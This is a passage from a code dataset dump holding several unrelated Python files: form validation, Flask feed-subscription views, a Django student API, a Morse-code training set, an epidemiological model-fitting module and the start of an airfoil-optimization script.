self.start.json_identifiers(),\n 'errors': header_err}\n\n if not block:\n blob = self.success_header_generate()\n if blob:\n retval['success_blob'] = blob\n if hasattr(self, 'start'):\n retval['success_ids'] = self.start.json_identifiers()\n\n retval['errors'] = errors\n\n # Throw back a variable in the json if there is both a submit\n # and no blocking errors. The main purpose here is the allow\n # easy catching of success in the view code.\n if data.get('submit_action', 'false') == 'true' and not block:\n valid = True\n self.trigger_event(\"validate_success\")\n else:\n self.trigger_event(\"validate_failure\")\n valid = False\n\n # Hold our return dictionary in memeory for easy editing later\n self._last_raw_json = retval\n\n # process the errors before we serialize\n self._process_errors()\n\n # Return our raw dictionary if requested, otherwise serialize for\n # convenience...\n if raw:\n return valid, retval\n else:\n return valid, json.dumps(retval)\n\n def validate(self, data):\n \"\"\" Runs all the validators associated with the :class:`Form`.\n\n :return: Whether the validators are blocking submission and a list of\n nodes that have validation messages.\n \"\"\"\n\n # Allows user to set a modular processor on incoming data\n data = self._processor().filter_post(data)\n block, invalid = self._gen_validate(data)\n\n # Run our validation trigger events\n if block:\n self.trigger_event(\"validate_failure\")\n else:\n self.trigger_event(\"validate_success\")\n\n return (not block), invalid\n\n def validate_render(self, data):\n \"\"\" Runs all the validators on the `data` that is passed in and returns\n a re-render of the :class:`Form` if there are validation errors,\n otherwise it returns True representing a successful submission. Since\n validators are designed to pass error information in through the\n :attr:`Node.errors` attribute then this error information is in turn\n availible through the rendering context.\n\n :param data: The data to be passed through the\n `Form._processor`. If the data is in the form of a dictionary\n where the key is the 'name' of the form field and the data is a\n string then no post-processing is neccessary.\n :type data: dictionary\n\n :return: Whether the validators are blocking submission and a re-render\n of the form with the validation data passed in.\n \"\"\"\n\n # Allows user to set a modular processor on incoming data\n data = self._processor().filter_post(data)\n\n block, invalid = self._gen_validate(data)\n\n self.g_context['block'] = block\n\n # update our state var for later update_success calls\n self._last_valid = 'render'\n\n # run our form validators at the end\n if not block:\n self.trigger_event(\"validate_success\")\n self.success_header_generate()\n else:\n self.trigger_event(\"validate_failure\")\n self.error_header_generate(invalid, block)\n\n return (not block), self.render()\n\n def validator(self):\n \"\"\" This is provided as a convenience method for Validation logic that\n is one-off, and only intended for a single form. Simply override this\n function and access any of your Nodes and their data via the self. This\n method will be called after all other Validators are run. \"\"\"\n pass\n\n def update_success(self, update_dict, raw=False):\n \"\"\" This method serves as an easy way to update your success attributes\n that are passed to the start Node rendering context, or passed back in\n JSON. It automatically recalls whether the last validation call was to\n json_validate or validate_render and modifys the correct dictionary\n accordingly.\n\n :param update_dict: The dictionary of values to update/add.\n :type data: dictionary\n\n :param raw: Whether you would like a pre-compiled JSON\n string returned, or the raw dictionary.\n :type raw: bool\n\n :return: Return value is either the new JSON string (or raw dict if\n requested) if json_validate was your last validation call, or a\n re-render of the form with updated error messages if validate_render\n was your last call.\n \"\"\"\n\n if self._last_valid == 'render':\n try:\n self.start.errors[-1].update(update_dict)\n except IndexError:\n raise IndexError(\"Error updating your error dictionary for the \"\n \"start Node. There were no errors to modify.\")\n except AttributeError:\n raise AttributeError(\"This method is designed to update an \"\n \"error dictionary, yet your errors are \"\n \"not dictionaries\")\n\n return self.render()\n\n # We're going to default to json render\n else:\n # Modify our last json dict\n try:\n self._last_raw_json['success_blob'].update(update_dict)\n except KeyError:\n raise KeyError(\"Either your json_validate method has not been \"\n \"run yet, or your success_header_generate does\"\n \" not produce output\")\n\n # Continue the raw semantic...\n if raw:\n return self._last_raw_json\n else:\n return json.dumps(self._last_raw_json)\n\n","sub_path":"src/yota/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":28716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428369649","text":"import re\nimport time\nfrom typing import List, Dict\n\nfrom celery import group\nfrom flask import render_template, request, current_app as app, jsonify, flash\nfrom flask_security import current_user, login_required\n\nfrom feedrsub.feeds import feeds_blueprint as bp\nfrom feedrsub.feeds.feedfactory import FeedFactory\nfrom feedrsub.feeds.session_manager import FeedSessionManager\nfrom feedrsub.feeds.tasks import task_search_feed\nfrom feedrsub.ingestion import subscriber\nfrom feedrsub.utils.flash import ALERT\n\ncomment_pattern = '\\/comment(?:s)?(?:\\/)?'\ncomment_regex = re.compile(comment_pattern)\n\nexcluded_domains = ['auctorial.com']\n\n\n@bp.route('/subscribe', methods=['GET'])\n@login_required\ndef subscribe_feeds():\n flash('Search for RSS, Atom, or JSON feeds using the Search Box below. Enter the URL of the Website where ' +\n 'the Writers you\\'d like to follow are published, then click the \"Search for Feeds\" button. If we find any Feeds, ' +\n 'they will be displayed below the Search Box. Click the \"Subscribe\" button for the relevant Feed, and we will ' +\n 'automatically start following them. If the Writers you are following have Articles in the Feed, you will ' +\n 'start being notified when new Articles appear.', ALERT.INFO)\n return render_template('subscribe.html')\n\n\n@bp.route('/findfeeds', methods=['GET', 'POST'])\ndef search_feeds():\n \"\"\"\n Search for feeds for a given list of urls\n \"\"\"\n\n if request.method == 'POST':\n urls = request.form.getlist('urls[]')\n else:\n urls = request.args.getlist('url')\n\n # Accept a max of 3 unique URLs\n urls = set(urls[:3])\n\n app.logger.info('Searching for Feeds at Urls: %s', urls)\n\n start_time = time.perf_counter()\n\n # Create a Celery Task for each URL\n tasks = []\n for url in urls:\n tasks.append(task_search_feed.s(url))\n\n job = group(tasks)\n result = job.apply_async()\n\n # Get Results of Tasks\n result_list = result.get()\n\n json_feeds: List[Dict] = []\n not_found: List[str] = []\n excluded: List[str] = []\n\n for result in result_list:\n # Unpack result Tuple[List[Dict], List[str], List[str]]\n feeds, included, excluded = result\n json_feeds.extend(feeds)\n not_found.extend(included)\n excluded.extend(excluded)\n\n # Save FeedInfo to Session\n FeedSessionManager.save_feed_info(json_feeds)\n\n search_time = (time.perf_counter() - start_time)\n search_time_in_ms = int(search_time * 1000)\n\n app.logger.info('Returning found Feeds: %s', json_feeds)\n return jsonify({\"feeds\": json_feeds,\n \"not_found\": not_found,\n \"excluded\": excluded,\n \"search_time\": search_time_in_ms})\n\n\n@bp.route('/sendsubscribe', methods=['POST'])\n@login_required\ndef send_subscribe_feed():\n \"\"\"\n Subscribes to a single feed.\n \"\"\"\n\n requested_url = request.get_json()\n app.logger.info('%s requested Subscription to URL: %s', current_user, requested_url)\n\n # Only subscribe if feed was found by search_feed method and\n # loaded in session, otherwise return empty result.\n if requested_url not in FeedSessionManager.load_feed_urls():\n app.logger.warning('Requested URL: %s was not found in session', requested_url)\n return jsonify({'subscribed': None})\n\n feed_info = FeedSessionManager.get_requested_feed_info(requested_url)\n\n if not feed_info:\n app.logger.warning('Requested StatusFeedInfo for URL: %s was not found in session', requested_url)\n return jsonify({'subscribed': None})\n\n feed = FeedFactory.create_or_activate_feed(feedinfo=feed_info,\n user=current_user)\n\n if feed.is_push:\n try:\n app.logger.info('Sending subscription request for %s to %s', feed, feed.hub)\n subscriber.subscribe(feed.topic)\n except Exception as e:\n app.logger.warning('Failed to subscribe to %s: %s', feed, e)\n\n return jsonify({'subscribed': feed_info.url})\n","sub_path":"feedrsub/feeds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295895217","text":"from django.contrib.sites import requests\nfrom django.shortcuts import render\n# Create your views here.\nfrom rest_framework import viewsets, filters, permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.reverse import reverse\n\nfrom .models import Student\nfrom .serializers import StudentSerializer\n\nclass PermissionsPerMethodMixin(object):\n def get_permissions(self):\n \"\"\"\n Allows overriding default permissions with @permission_classes\n \"\"\"\n view = getattr(self, self.action)\n if hasattr(view, 'permission_classes'):\n return [permission_class() for permission_class in view.permission_classes]\n return super().get_permissions()\n\nclass StudentPagination(PageNumberPagination):\n page_size = 25\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = [IsAuthenticated,]\n pagination_class = StudentPagination\n filter_backends = (filters.SearchFilter,)\n search_fields = ('roll_no', 'name')\n\n def get_queryset(self):\n return self.queryset\n\n @action(detail=False, methods=['get'])\n def activate(self, request,*args, **kwargs):\n protocol = 'https://' if request.is_secure() else 'http://'\n web_url = protocol + request.get_host()\n post_url = \"http://127.0.0.1:8100/djoser_auth/users/activation/\"\n uid = request.query_params.get('uid')\n token = request.query_params.get('token')\n print(\"UID AND TOKEN\", uid, token)\n post_data = {'uid': uid, 'token': token}\n result = requests.post(post_url, post_data)\n content = result.text\n print(\"COOO\", content)\n return Response(content)\n\n @action(detail=False, methods=['get'])\n def get_student(self, request, *args, **kwargs):\n id = request.query_params.get('id')\n student = self.queryset.get(id=id)\n serializer = StudentSerializer(student, context={'request': request})\n return Response(serializer.data)\n\n @action(detail=False, methods=['get'])\n def student_info(self, request, *args, **kwargs):\n student = self.queryset.get(username = request.user)\n serializer = StudentSerializer(student, context={'request':request})\n return Response(serializer.data)\n\n @action(detail=False, methods=['post'])\n def update_info(self, request, *args, **kwargs):\n data = request.data\n Student.objects.filter(username=request.user).update(**request.data)\n student = self.queryset.get(username=request.user)\n serializer = StudentSerializer(student, context={'request': request})\n return Response(serializer.data)\n\n","sub_path":"tnp/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"586440562","text":"__author__ = 'Avantha'\nimport threading\n\nclass AvanthaMessages(threading.Thread):\n def run(self):\n for _ in range(10):# thius ignores a variable but loop for 10 times\n print(threading.current_thread().getName())\n\nx = AvanthaMessages(name='Send out messages')\ny = AvanthaMessages(name='Receive messages')\nx.start()\ny.start()\n\n","sub_path":"Threading.py","file_name":"Threading.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"309663922","text":"import json\nfrom pprint import pprint\n\nwith open('data/manifestsample.json') as data_file:\n data = json.load(data_file)\n\n\n#pprint(data)\n\n\n#print(len(data))\n\"\"\"\nData is only 1 object in a list. Why?\nIs this being manually generated? If so, why? While this is valid, it is not logical.\n\"\"\"\n\ndata = data[0] # Pull the first item out.\n\nfor item in data:\n #pprint(item)\n\n \"\"\"\n Keys\n ['Generator', 'InternationalShipmentInfo', 'TSDF',\n 'EmergencyResponsePhone', 'DesignatedFacilityInfo',\n 'ManifestTrackingNumber', 'Transporter', 'ManifestedWaste',\n 'AdditionalInfo_Line14']\n \"\"\"\n\n for value in data[item]:\n #pprint(type(value))\n \"\"\" Values are strings or dicts \"\"\"\n\n print(item, value)\n\n\n\n","sub_path":"parse_json.py","file_name":"parse_json.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"578036179","text":"from collections import defaultdict\nfrom timeit import default_timer as timer\nfrom types import SimpleNamespace\n\nimport pandas as pd\nfrom numpy import nan\n\nfrom cascade.core import getLoggers\nfrom cascade.core.db import db_queries, age_spans\nfrom cascade.executor.covariate_data import assign_epiviz_covariate_names\nfrom cascade.executor.covariate_data import find_covariate_names, add_covariate_data_to_observations_and_avgints\nfrom cascade.executor.session_options import make_options, make_minimum_meas_cv\nfrom cascade.input_data.configuration.construct_bundle import (\n normalized_bundle_from_database,\n normalized_bundle_from_disk,\n bundle_to_observations,\n strip_bundle_exclusions,\n dataframe_from_disk)\nfrom cascade.input_data.configuration.construct_country import check_binary_covariates\nfrom cascade.input_data.configuration.construct_country import convert_gbd_ids_to_dismod_values\nfrom cascade.input_data.configuration.construct_mortality import get_raw_csmr, normalize_csmr\nfrom cascade.input_data.configuration.id_map import make_integrand_map\nfrom cascade.input_data.db.asdr import asdr_as_fit_input\nfrom cascade.input_data.db.country_covariates import country_covariate_set\nfrom cascade.input_data.db.locations import (\n location_hierarchy, location_hierarchy_to_dataframe, all_locations_with_these_parents\n)\nfrom cascade.input_data.db.study_covariates import get_study_covariates\nfrom cascade.model import ObjectWrapper\nfrom cascade.model.integrands import make_average_integrand_cases_from_gbd\nfrom cascade.saver.save_prediction import save_predicted_value, uncertainty_from_prediction_draws\n\nCODELOG, MATHLOG = getLoggers(__name__)\n\n\ndef retrieve_data(execution_context, local_settings, included_locations, covariate_data_spec):\n \"\"\"Gets data from the outside world.\"\"\"\n data = SimpleNamespace()\n data_access = local_settings.data_access\n model_version_id = data_access.model_version_id\n\n data.locations = location_hierarchy(\n data_access.gbd_round_id, location_set_version_id=data_access.location_set_version_id)\n\n if data_access.bundle_file:\n data.bundle = normalized_bundle_from_disk(data_access.bundle_file)\n else:\n data.bundle = normalized_bundle_from_database(\n execution_context,\n model_version_id,\n bundle_id=local_settings.data_access.bundle_id,\n tier=local_settings.data_access.tier\n )\n CODELOG.debug(f\"Bundle length {len(data.bundle)} \")\n # Study covariates will have columns {\"bundle_id\", \"seq\", \"study_covariate_id\"}.\n if data_access.bundle_study_covariates_file:\n data.sparse_covariate_data = dataframe_from_disk(data_access.bundle_study_covariates_file)\n else:\n mvid = data_access.model_version_id\n data.sparse_covariate_data = get_study_covariates(\n execution_context, data_access.bundle_id, mvid, tier=data_access.tier)\n\n country_covariate_ids = {\n spec.covariate_id for spec in covariate_data_spec\n if spec.study_country == \"country\"\n }\n data.study_id_to_name, data.country_id_to_name = find_covariate_names(\n execution_context, covariate_data_spec)\n assign_epiviz_covariate_names(\n data.study_id_to_name, data.country_id_to_name, covariate_data_spec\n )\n\n # Raw country covariate data. Must be subset for children.\n covariates_by_age_id = country_covariate_set(\n country_covariate_ids,\n demographics=dict(age_group_ids=\"all\", year_ids=\"all\", sex_ids=\"all\",\n location_ids=list(data.locations.nodes)),\n gbd_round_id=data_access.gbd_round_id,\n decomp_step=data_access.decomp_step,\n )\n # Every age group defined, so that we can search for what's given.\n all_age_spans = age_spans.get_age_spans()\n data.country_covariates = dict()\n for covariate_id, covariate_df in covariates_by_age_id.items():\n ccov_ranges_df = convert_gbd_ids_to_dismod_values(covariate_df, all_age_spans)\n data.country_covariates[covariate_id] = ccov_ranges_df\n\n data.country_covariates_binary = check_binary_covariates(execution_context, country_covariate_ids)\n\n # Standard GBD age groups with IDs, start, finish.\n data.ages_df = db_queries.get_age_metadata(\n age_group_set_id=data_access.age_group_set_id,\n gbd_round_id=data_access.gbd_round_id\n )\n # Returns a dictionary of demographic IDs.\n data.years_df = db_queries.get_demographics(\n gbd_team=\"epi\", gbd_round_id=data_access.gbd_round_id)[\"year_id\"]\n\n # This comes in yearly from 1950 to 2018\n # Must be subset for children.\n mortality_locations = all_locations_with_these_parents(\n data.locations, included_locations\n )\n all_sexes = [1, 2, 3]\n data.age_specific_death_rate = asdr_as_fit_input(\n data_access.location_set_version_id,\n mortality_locations,\n all_sexes,\n data_access.gbd_round_id,\n data_access.decomp_step,\n data.ages_df,\n with_hiv=data_access.with_hiv\n )\n data.cause_specific_mortality_rate = get_raw_csmr(\n execution_context, local_settings.data_access,\n mortality_locations, all_age_spans)\n\n return data\n\n\ndef modify_input_data(input_data, local_settings):\n \"\"\"Transforms data to input for model.\"\"\"\n ev_settings = local_settings.settings\n # These are suitable for input to the fit.\n if not ev_settings.eta.is_field_unset(\"data\") and ev_settings.eta.data:\n data_eta = defaultdict(lambda: float(ev_settings.eta.data))\n else:\n data_eta = defaultdict(lambda: nan)\n id_to_integrand = make_integrand_map()\n for set_eta in ev_settings.data_eta_by_integrand:\n data_eta[id_to_integrand[set_eta.integrand_measure_id]] = float(set_eta.value)\n\n if not ev_settings.model.is_field_unset(\"data_density\") and ev_settings.model.data_density:\n density = defaultdict(lambda: ev_settings.model.data_density)\n else:\n density = defaultdict(lambda: \"gaussian\")\n for set_density in ev_settings.data_density_by_integrand:\n density[id_to_integrand[set_density.integrand_measure_id]] = set_density.value\n\n csmr = normalize_csmr(input_data.cause_specific_mortality_rate, local_settings.sexes)\n CODELOG.debug(f\"bundle cols {input_data.bundle.columns}\\ncsmr cols {csmr.columns}\")\n assert not set(csmr.columns) - set(input_data.bundle.columns)\n bundle_with_added = pd.concat([input_data.bundle, csmr], sort=False)\n bundle_without_excluded = strip_bundle_exclusions(bundle_with_added, ev_settings)\n nu = defaultdict(lambda: nan)\n nu[\"students\"] = local_settings.settings.students_dof.data\n nu[\"log_students\"] = local_settings.settings.log_students_dof.data\n\n # These observations still have a seq column.\n input_data.observations = bundle_to_observations(\n bundle_without_excluded,\n local_settings.parent_location_id,\n data_eta,\n density,\n nu,\n )\n # ev_settings.data_eta_by_integrand is a dummy in form.py.\n MATHLOG.info(f\"Ignoring data_eta_by_integrand\")\n\n input_data.locations_df = location_hierarchy_to_dataframe(input_data.locations)\n return input_data\n\n\ndef one_location_data_from_global_data(global_data, local_settings):\n \"\"\"\n Responsible for localizing global data to this location and its children.\n The global data has been saved, for all locations, earlier. This\n looks at settings and subselects that data.\n\n Args:\n global_data (SimpleNamespace): A bag of data.\n local_settings (SimpleNamespace): Settings that have been build\n for this location.\n\n Returns:\n SimpleNamespace: The same object, but data is modified.\n \"\"\"\n include_birth_prevalence = local_settings.settings.model.birth_prev\n # Make avgints here b/c they are wrote and not worth saving.\n global_data.average_integrand_cases = \\\n make_average_integrand_cases_from_gbd(\n global_data.ages_df,\n global_data.years_df,\n local_settings.sexes,\n local_settings.children,\n include_birth_prevalence\n )\n add_covariate_data_to_observations_and_avgints(global_data, local_settings, global_data.covariate_data_spec)\n global_data.observations = global_data.observations.drop(columns=[\"sex_id\", \"seq\"])\n set_sex_reference(global_data.covariate_data_spec, local_settings)\n\n # These are the draws as output of the parent location. Called draws.\n global_data.draws = None\n\n # The parent can also supply integrands as a kind of prior.\n # These will be shaped like input measurement data. Called fit-integrands.\n global_data.integrands = None\n return global_data\n\n\ndef set_sex_reference(covariate_data_spec, local_settings):\n \"\"\"The sex covariate holds out data for the sex by setting the ``reference``\n and ``max_difference``. If sex is 1, then set reference to 0.5 and max\n difference to 0.75. If sex is 2, reference is -0.5. If it's 3 or 4,\n then reference is 0.\"\"\"\n sex_covariate = [sc_sex for sc_sex in covariate_data_spec\n if sc_sex.covariate_id == 0 and sc_sex.transformation_id == 0]\n if sex_covariate:\n sex_assignments_to_exclude_by_value = {\n (1,): [0.5, 0.25],\n (2,): [-0.5, 0.25],\n (3,): [0.0, 0.25],\n (1, 3): [0.5, 0.75],\n (2, 3): [-0.5, 0.75],\n (1, 2, 3): [0.0, 0.75],\n }\n reference, max_difference = sex_assignments_to_exclude_by_value[tuple(sorted(local_settings.sexes))]\n sex_covariate[0].reference = reference\n sex_covariate[0].max_difference = max_difference\n\n\ndef compute_parent_fit_fixed(execution_context, db_path, local_settings, input_data, model):\n \"\"\"\n\n Args:\n execution_context:\n input_data: These include observations and initial guess.\n model (Model): A complete Model object.\n\n Returns:\n The fit.\n \"\"\"\n begin = timer()\n dismod_objects = ObjectWrapper(str(db_path))\n dismod_objects.locations = input_data.locations_df\n dismod_objects.parent_location_id = model.location_id\n dismod_objects.model = model\n dismod_objects.set_option(**make_options(local_settings.settings, local_settings.model_options))\n for integrand_name, value in make_minimum_meas_cv(local_settings.settings).items():\n dismod_objects.set_minimum_meas_cv(integrand_name, value)\n if not local_settings.run.db_only:\n dismod_objects.run_dismod(\"init\")\n stdout, stderr, _metrics = dismod_objects.run_dismod([\"fit\", \"fixed\"])\n CODELOG.debug(stdout)\n CODELOG.debug(stderr)\n else:\n dismod_objects.run_dismod(\"init\")\n MATHLOG.info(f\"Ran with db_only so not running dismod fit fixed on {db_path}.\")\n CODELOG.info(f\"fit fixed {timer() - begin}\")\n\n\ndef compute_parent_fit(execution_context, db_path, local_settings, simulate_idx=None):\n \"\"\"\n\n Args:\n execution_context:\n input_data: These include observations and initial guess.\n model (Model): A complete Model object.\n simulate_idx (int): Which simulation to fit.\n\n Returns:\n The fit.\n \"\"\"\n begin = timer()\n dismod_objects = ObjectWrapper(str(db_path))\n dismod_objects.set_option(**make_options(local_settings.settings, local_settings.model_options))\n fit_var = dismod_objects.fit_var\n dismod_objects.start_var = fit_var\n dismod_objects.scale_var = fit_var\n\n if not local_settings.run.db_only:\n dismod_objects.run_dismod(\"init\")\n command = [\"fit\", \"both\"]\n if simulate_idx is not None:\n command += [simulate_idx]\n stdout, stderr, _metrics = dismod_objects.run_dismod(command)\n CODELOG.debug(stdout)\n CODELOG.debug(stderr)\n else:\n dismod_objects.run_dismod(\"init\")\n MATHLOG.info(f\"Ran with db_only so not running dismod fit both on {db_path}.\")\n CODELOG.info(f\"fit fixed {timer() - begin}\")\n\n dismod_objects.avgint = None # Need to make an avgint table.\n dismod_objects.truth_var = dismod_objects.fit_var\n dismod_objects.run_dismod([\"predict\", \"truth_var\"])\n\n draw_cnt = local_settings.number_of_fixed_effect_samples\n dismod_objects.run_dismod([\"simulate\", str(draw_cnt)])\n\n\ndef gather_simulations_and_fit(fit_path, simulation_paths):\n predictions = list()\n for draw_path in simulation_paths:\n draw_objects = ObjectWrapper(str(draw_path))\n predicted, not_predicted = draw_objects.predict\n predictions.append(predicted)\n draw_objects.close()\n\n fit_objects = ObjectWrapper(str(fit_path))\n pred_fit, not_pred_fit = fit_objects.predict\n fit_objects.close()\n return pred_fit, predictions\n\n\ndef save_outputs(\n computed_fit, predictions, execution_context, local_settings, summary_path\n):\n predictions = uncertainty_from_prediction_draws(computed_fit, predictions)\n save_predicted_value(\n execution_context, predictions, \"fit\", summary_path, local_settings.run.no_upload\n )\n\n\ndef fit_and_predict_fixed_effect_sample(db_path, draw_idx):\n dismod_objects = ObjectWrapper(str(db_path))\n # -1 because we are using 1-based draw index and Dismod-AT is zero-based.\n dismod_objects.run_dismod([\"fit\", str(draw_idx - 1)])\n dismod_objects.avgint = None # Need to make an avgint table.\n dismod_objects.truth_var = dismod_objects.fit_var\n dismod_objects.run_dismod([\"predict\"])\n","sub_path":"src/cascade/executor/estimate_location.py","file_name":"estimate_location.py","file_ext":"py","file_size_in_byte":13427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197901606","text":"import random\n\nnletters = 26\nrunning_output = False\ncode_conversions = [None] * 27\n\ncode_conversions[1] = \".-\" # A 2 4 (5)\ncode_conversions[2] = \"-...\" # B 4 8 (9)\ncode_conversions[3] = \"-.-.\" # C 4 9 (11)\ncode_conversions[4] = \"-..\" # D 3 6 (7)\ncode_conversions[5] = \".\" # E 1 1 (1)\ncode_conversions[6] = \"..-.\" # F 4 8 (9)\ncode_conversions[7] = \"--.\" # G 3 7 (9)\ncode_conversions[8] = \"....\" # H 4 7 (7)\ncode_conversions[9] = \"..\" # I 2 3 (3)\ncode_conversions[10] = \".---\" # J 4 10 (13)\ncode_conversions[11] = \"-.-\" # K 3 7 (9)\ncode_conversions[12] = \".-..\" # L 4 8 (9)\ncode_conversions[13] = \"--\" # M 2 5 (7)\ncode_conversions[14] = \"-.\" # N 2 4 (5)\ncode_conversions[15] = \"---\" # O 3 8 (11)\ncode_conversions[16] = \".--.\" # P 4 9 (11)\ncode_conversions[17] = \"--.-\" # Q 4 10 (13)\ncode_conversions[18] = \".-.\" # R 3 6 (7)\ncode_conversions[19] = \"...\" # S 3 5 (5)\ncode_conversions[20] = \"-\" # T 1 2 (3)\ncode_conversions[21] = \"..-\" # U 3 6 (7)\ncode_conversions[22] = \"...-\" # V 4 8 (9)\ncode_conversions[23] = \".--\" # W 3 7 (9)\ncode_conversions[24] = \"-..-\" # X 4 9 (11)\ncode_conversions[25] = \"-.--\" # Y 4 10 (13)\ncode_conversions[26] = \"--..\" # Z 4 9 (11)\n\n\ndef random_string(length, chars_used=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"):\n \"\"\"Returns a random string of length length using only the characters present\n in the string chars_used; removes duplicates so each character has equal\n probability of being chosen\"\"\"\n chars_used = list(set(chars_used.upper()))\n s = [None] * length\n for i in range(length):\n s[i] = random.choice(chars_used)\n return ''.join(s)\n\n\ndef string_to_code(s):\n \"\"\"Given a string of characters, S returns three values: a vector of input\n patterns in the proper morse-code representation, a corresponding vector\n of output patterns, and a vector of break values with a T at the start of\n each new character.\"\"\"\n inlist = []\n outlist = []\n breaklist = []\n for i in range(len(s)):\n c = ord(s[i]) - 64\n morse = code_conversions[c]\n outpat = [-0.5] * (nletters + 1)\n strobepat = [-0.5] * (nletters + 1)\n if (running_output):\n outpat[c] = 0.5\n strobepat[0] = 0.5\n strobepat[c] = 0.5\n for j in range(len(morse)):\n if (morse[j] == '.'):\n inlist = [[-0.5], [0.5]] + inlist\n outlist = [outpat[:], outpat[:]] + outlist\n breaklist = [False, (j == 0)] + breaklist\n else:\n inlist = [[-0.5], [0.5], [0.5]] + inlist\n outlist = [outpat[:], outpat[:], outpat[:]] + outlist\n breaklist = [False, False, (j == 0)] + breaklist\n outlist = [strobepat[:]] + outlist\n inlist = [[-0.5]] + inlist\n breaklist = [False] + breaklist\n\n inlist.reverse()\n outlist.reverse()\n breaklist.reverse()\n return (inlist, outlist, breaklist)\n\ntraining_string = None\ntest_string = None\n\ndef build_morse(s, continuing=False):\n \"\"\"Given a string of characters, create a training set for the morse code\n representation of the string. There is no test set. If CONTINUE is on,\n make use of pre-existing hidden units.\"\"\"\n global training_string, training_inputs, training_outputs, training_breaks, use_training_breaks, test_inputs, \\\n test_outputs, test_breaks, test_string, \\\n use_test_breaks, ninputs, noutputs, nletters\n\n training_string = s\n (inputs, outputs, breaks) = string_to_code(s)\n training_inputs = inputs\n training_outputs = outputs\n training_breaks = breaks\n use_training_breaks = True\n test_inputs = training_inputs\n test_outputs = training_outputs\n test_breaks = training_breaks\n test_string = None\n use_test_breaks = True\n ninputs = 1\n noutputs = nletters + 1\n if continuing:\n changed_training_set()\n # build_net(ninputs, noutputs)\n # init_net()\n print(f'Training on {s}')\n\n\n\n\nbuild_morse(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\")\n\n","sub_path":"Cascor-NumPy/datasets/morse.py","file_name":"morse.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"545669408","text":"\"\"\"Optimize wing section for a given planform and flight condition.\"\"\"\n\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport matplotlib.font_manager as font_manager\n\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom deap import algorithms\n\nfrom ambiance import Atmosphere\n\nfrom aerodynamics_toolbox import interpolate_airfoil_polar\nfrom aerodynamics_toolbox import get_3D_aerodynamics\nfrom aerodynamics_toolbox import runXfoil\n\nfrom aircraft_plotter import naca_4_series\nfrom aircraft_plotter import create_VSP_wing\n\nsns.set_theme(style='darkgrid', font='Palatino Linotype', context='paper')\nFONT_FILE = 'C:/Windows/Fonts/pala.ttf'\nfont_manager.fontManager.addfont(FONT_FILE)\n\n\n# %% Problem constants\n\nH = 640 # m AMSL\nV = 22 # m/s\ng = Atmosphere(H).grav_accel[0] # m/s^2\nrho = Atmosphere(H).density[0] # kg/m^3\nnu = Atmosphere(H).kinematic_viscosity[0] # m^2/s\n\nWL = 23.239 # kg/m^2\nW0 = 10 # kg\nAR = 11\n\n# planform = [0.344, 0.329, 0.232, 0.2] # 6 sections\n# planform = [0.34, 0.338, 0.303, 0.202, 0.2] # 8 sections\nplanform = [0.252, 0.236, 0.186, 0.1] # 10 sections\nn_sections = 6\n\nmax_camber_min = 0 # %\nmax_camber_max = 6 # %\nmax_camber_loc_min = 2 # 10%\nmax_camber_loc_max = 6 # 10%\nmax_tc_min = 13 # %\nmax_tc_max = 25 # %\n\nS_ideal = W0/WL # m^2\nb = round(np.sqrt(AR*S_ideal), 2) # m\ndy = b/n_sections # m\ny_stations = np.linspace(0, b/2, n_sections//2 + 1) # m\nc_array = np.array(planform)\nS_array = (c_array[:-1] + c_array[1:])/2*dy\n\nS_real = 2*np.sum(S_array)\nMGC = round(np.sum((c_array[:-1] + c_array[1:])/2*S_array)/(S_real/2), 3)\n\nLambda_midc = np.sum(np.arctan(\n (c_array[1:] - c_array[0:-1])/(4*dy))*S_array)/S_real\n\nL = W0*g\nCL = round(L/(0.5*rho*V**2*S_real), 4)\n\nLr = L/(np.pi/4*b)\ncl_r = round(2*Lr/(rho*V**2*c_array[0]), 4)\nRe = (V*MGC)/nu\n\n# %% GA - Airfoil\n\n\ndef optimize_airfoil(population_size, max_generations, p_crossover,\n p_mutation):\n \"\"\"Airfoil optimization algorithm.\"\"\"\n hall_of_fame_size = 1\n\n toolbox = base.Toolbox()\n\n # Create fitness function class\n creator.create('FitnessMin', base.Fitness, weights=(-1.0,))\n\n # Create individual class\n creator.create('Individual', list, fitness=creator.FitnessMin)\n\n # Random wing sections generator\n def get_airfoil(y_stations):\n\n max_camber = round(random.randint(max_camber_min, max_camber_max), 0)\n max_camber_loc = round(random.randint(max_camber_loc_min,\n max_camber_loc_max), 0)\n max_tc = round(random.randint(max_tc_min, max_tc_max), 0)\n\n return [max_camber, max_camber_loc, max_tc]\n\n toolbox.register('generate_airfoil', get_airfoil, y_stations)\n\n # Create individual generator\n toolbox.register('individual_creator', tools.initIterate,\n creator.Individual, toolbox.generate_airfoil)\n\n # Create population generator\n toolbox.register('population_creator', tools.initRepeat, list,\n toolbox.individual_creator)\n\n # Fitness evaluation\n def get_wing_CDp(individual):\n\n alpha_array, cl_array, cd_array = interpolate_airfoil_polar(individual,\n Re)\n\n CDp = get_3D_aerodynamics(AR, Lambda_midc, cl_r, alpha_array, cl_array,\n cd_array)[-1]\n\n return CDp,\n\n # Define geneitc 